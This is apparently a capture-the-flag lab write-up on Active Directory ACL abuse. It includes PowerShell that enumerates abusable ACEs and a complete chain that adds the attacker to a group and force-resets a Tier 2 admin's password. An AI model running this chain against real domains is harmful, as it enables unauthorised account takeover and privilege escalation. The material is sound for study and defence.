Exploiting Permission Delegation
Permission delegation is the process of granting specific permissions or authority to a user, group, or system so that it can perform certain tasks or access certain resources. It is commonly used to allow controlled access without sharing full credentials or privileges.
Permission delegation exploits are often referred to as ACL-based attacks. AD allows administrators to configure Access Control Entries (ACEs) that populate Discretionary Access Control Lists (DACLs), hence the name. Almost any AD object can be secured with ACEs. However, if these ACEs are misconfigured, an attacker may be able to abuse them.
Exploiting ACEs
A significant number of ACEs can be misconfigured; some of the ones worth looking for are:
ForceChangePassword: We have the ability to reset the target user's password without knowing their current password.
AddMembers: We have the ability to add users (including our own account), groups or computers to the target group.
GenericAll: We have complete control over the object, including the ability to change a user's password, register an SPN on it, or add an AD object to the target group.
GenericWrite: Write access to the object's non-protected attributes. On a group this includes the member attribute, so we can modify its membership; on a user it includes attributes such as the SPN.
WriteOwner: We have the ability to update the owner of the target object. We could make ourselves the owner, which in turn lets us grant ourselves additional permissions over the object.
WriteDACL: We have the ability to write new ACEs to the target object's DACL. We could, for example, write an ACE that grants our account full control over the target object.
AllExtendedRights: We have the ability to perform any action associated with extended AD rights against the target object. This includes, for example, the ability to force-change a user's password.
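Before trusting a BloodHound edge, it is worth reading the DACL yourself and confirming which of the rights above the principal actually holds. The following is an added example (not part of the original write-up): it pulls the DACL of an AD object with the RSAT ActiveDirectory module and labels each Allow ACE with the abusable right(s) it corresponds to. The two GUIDs are the well-known schema/rights GUIDs for the member attribute and the User-Force-Change-Password extended right. The function name Get-AbusableAces and the two usage calls at the bottom are mine; the write-up names IT Support, Tier 2 Admins and t2_ross.bird but does not say which trustee holds the GenericWrite edge, so 'Domain Users' in the first call is an assumption (substitute your own user if BloodHound draws the edge from your account).

```powershell
# Added example: enumerate abusable ACEs on an AD object (not the write-up's own code).
# Assumes the RSAT ActiveDirectory module and a domain-joined session (low-privileged creds are enough to read DACLs).
Import-Module ActiveDirectory

# Well-known GUIDs used to recognise attribute-scoped and right-scoped ACEs
$MemberAttributeGuid     = [Guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'  # 'member' attribute
$ForceChangePasswordGuid = [Guid]'00299570-246d-11d0-a768-00aa006e0529'  # User-Force-Change-Password extended right
$AnyObjectGuid           = [Guid]::Empty                                 # ACE not scoped to a single attribute/right

function Get-AbusableAces {
    # Returns each Allow ACE on $TargetIdentity whose trustee matches $PrincipalPattern,
    # tagged with the abusable right(s) from the list above that it grants.
    param(
        [Parameter(Mandatory)][string]$TargetIdentity,   # e.g. 'IT Support' or 't2_ross.bird'
        [Parameter(Mandatory)][string]$PrincipalPattern  # e.g. 'Domain Users' or 'IT Support'
    )

    $obj = Get-ADObject -Filter "Name -eq '$TargetIdentity' -or SamAccountName -eq '$TargetIdentity'" |
           Select-Object -First 1
    if (-not $obj) { throw "Object '$TargetIdentity' not found" }

    # The AD: PSDrive is created by the ActiveDirectory module; Get-Acl on it returns the object's DACL
    $acl = Get-Acl -Path "AD:\$($obj.DistinguishedName)"

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.IdentityReference.Value -notmatch [regex]::Escape($PrincipalPattern)) { continue }

        $r      = $ace.ActiveDirectoryRights
        $labels = [System.Collections.Generic.List[string]]::new()

        # Generic rights are flag combinations; HasFlag checks that every bit of the combination is present
        if ($r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll))   { $labels.Add('GenericAll') }
        if ($r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericWrite)) { $labels.Add('GenericWrite') }
        if ($r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteOwner))   { $labels.Add('WriteOwner') }
        if ($r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteDacl))    { $labels.Add('WriteDACL') }

        # WriteProperty on all attributes, or scoped to 'member', on a group object => AddMembers
        if ($obj.ObjectClass -eq 'group' -and
            $r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::WriteProperty) -and
            ($ace.ObjectType -eq $AnyObjectGuid -or $ace.ObjectType -eq $MemberAttributeGuid)) {
            $labels.Add('AddMembers')
        }

        # ExtendedRight unscoped => AllExtendedRights (which includes a forced reset); scoped to the
        # User-Force-Change-Password GUID => ForceChangePassword only
        if ($r.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) {
            if ($ace.ObjectType -eq $AnyObjectGuid) {
                $labels.Add('AllExtendedRights'); $labels.Add('ForceChangePassword')
            } elseif ($ace.ObjectType -eq $ForceChangePasswordGuid) {
                $labels.Add('ForceChangePassword')
            }
        }

        if ($labels.Count -eq 0) { continue }

        [pscustomobject]@{
            Target    = $obj.Name
            Principal = $ace.IdentityReference.Value
            Rights    = $r.ToString()
            Inherited = $ace.IsInherited
            Abusable  = ($labels -join ', ')
        }
    }
}

# Usage for the two hops in this room. The trustee 'Domain Users' on the first hop is an assumption.
Get-AbusableAces -TargetIdentity 'IT Support'   -PrincipalPattern 'Domain Users'
Get-AbusableAces -TargetIdentity 't2_ross.bird' -PrincipalPattern 'IT Support'
```

Note that ForceChangePassword is an ACE on the user object, not on the Tier 2 Admins group, which is why the second call targets a member account rather than the group. GenericAll implies every other label, so an ACE can legitimately come back with several.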
Tiering
Before proceeding we need to know what tiering is. It is a model designed to manage administrative assets in a centralized way, with least privilege as its core concept: credentials from a higher tier must never be exposed on a lower tier.

Tier-0 – Forest and Domain Administrators: Direct or indirect administrative control over the Active Directory forest, domains, or domain controller (DC). This includes administrative access to storage devices that contain Active Directory database files.
Tier-1 – Server Administrators: Direct or indirect administrative control over a single or multiple servers that do not fall into Tier-0. Business critical servers are also in this tier.
Tier-2 – Workstation Administrators, User Administrators, Helpdesk Technicians: Direct or indirect administrative control over a single or multiple devices and day-to-day user accounts.

BloodHound
For this room, SharpHound was already executed and the collected data was provided as a zip file.

Start neo4j
In another tab, start BloodHound

Change the username and password if needed. My credentials are neo4j:root
Upload the zip file containing the SharpHound data

Privilege Escalation
If we search for the user account we were assigned for this room, we can see that it can RDP into the THMWRK1 workstation. This only gives us low-privileged access, though, because the account is just a member of the "Domain Users" group.



We need to compromise the Tier 2 Admins group, since this group has administrative privileges on all workstations. We can ask BloodHound whether there is a path we can follow to compromise this group.


As we can see, permission delegation on the IT Support group is misconfigured: our account holds a GenericWrite ACE over it. GenericWrite covers the group's member attribute, so we can add our own user to IT Support.
Furthermore, BloodHound shows that the IT Support group has the ForceChangePassword ACE over the members of the Tier 2 Admins group. We can reset the password of any Tier 2 admin, hijack that account and gain administrative access to the THMWRK1 workstation.
First, SSH into THMWRK1 with our low-privileged credentials and start PowerShell

Add our user to the IT Support group
Verify it by listing the group's members

Now we abuse the ForceChangePassword ACE. Choose any user from the Tier 2 Admins group; I will go with t2_ross.bird

Build the new password as a secure string and reset the account with it
SSH into THMWRK1 as t2_ross.bird with the new password
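The commands behind the steps above were screenshots in the original; the following is an added example of the whole chain as typed into the PowerShell session on THMWRK1 (my reconstruction, not the write-up's own listing). 'IT Support', 'Tier 2 Admins' and t2_ross.bird come from the write-up; the value of $Me and the new password are placeholders you must replace.

```powershell
# Added example: abuse GenericWrite on a group, then ForceChangePassword on one of the
# group's targets, using the RSAT ActiveDirectory module on the foothold host.
Import-Module ActiveDirectory

$Me      = 'your.ad.username'     # assumption: the low-privileged account we were assigned
$Target  = 't2_ross.bird'         # Tier 2 admin from the write-up
$NewPass = 'Chang3dByIT$upport!'  # assumption: any value that satisfies the domain password policy

# 1. GenericWrite on IT Support lets us write to its 'member' attribute: add ourselves
Add-ADGroupMember -Identity 'IT Support' -Members $Me

# 2. Confirm the write landed
Get-ADGroupMember -Identity 'IT Support' | Select-Object SamAccountName

# 3. List the accounts the new membership gives us ForceChangePassword over
Get-ADGroupMember -Identity 'Tier 2 Admins' | Select-Object SamAccountName

# 4. Forced reset: -Reset means the old password is never supplied, which is exactly
#    what the ForceChangePassword right allows. Group membership is evaluated when a
#    logon token is built, so if this fails with "access denied" from the session that
#    ran step 1, either open a fresh SSH session or pass -Credential so the cmdlet
#    authenticates again and picks up the IT Support membership.
$Secure = ConvertTo-SecureString $NewPass -AsPlainText -Force
Set-ADAccountPassword -Identity $Target -Reset -NewPassword $Secure `
    -Credential (Get-Credential -UserName $Me -Message 'Re-authenticate with current group membership')

# 5. Quick sanity check that the reset was recorded before we try to log in as the target
Get-ADUser -Identity $Target -Properties PasswordLastSet | Select-Object SamAccountName, PasswordLastSet
```

After step 5, log in to THMWRK1 over SSH as the target user with $NewPass. Resetting a password this way is noisy: it changes PasswordLastSet, and the real owner will notice at their next logon, so on an engagement you would normally prefer a shadow-credentials or targeted-Kerberoast style abuse of the same rights where the account supports it.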

Nice. Now we should be able to retrieve the flag from the Administrator's Desktop.

